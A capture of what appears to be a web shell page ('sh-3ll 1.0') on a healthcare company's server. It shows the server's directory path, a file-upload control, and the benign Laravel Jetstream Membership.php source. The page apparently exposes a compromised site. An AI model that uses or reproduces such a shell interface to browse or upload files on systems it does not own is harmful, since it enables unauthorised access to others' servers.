HOME


sh-3ll 1.0
DIR:/proc/thread-self/cwd/bright.medisavehealthcarebd.com/vendor/laravel/jetstream/src/
Upload File :
Current File : //proc/thread-self/cwd/bright.medisavehealthcarebd.com/vendor/laravel/jetstream/src/Membership.php
<?php

namespace Laravel\Jetstream;

use Illuminate\Database\Eloquent\Relations\Pivot;

abstract class Membership extends Pivot
{
    /**
     * The table associated with the pivot model.
     *
     * @var string
     */
    protected $table = 'team_user';
}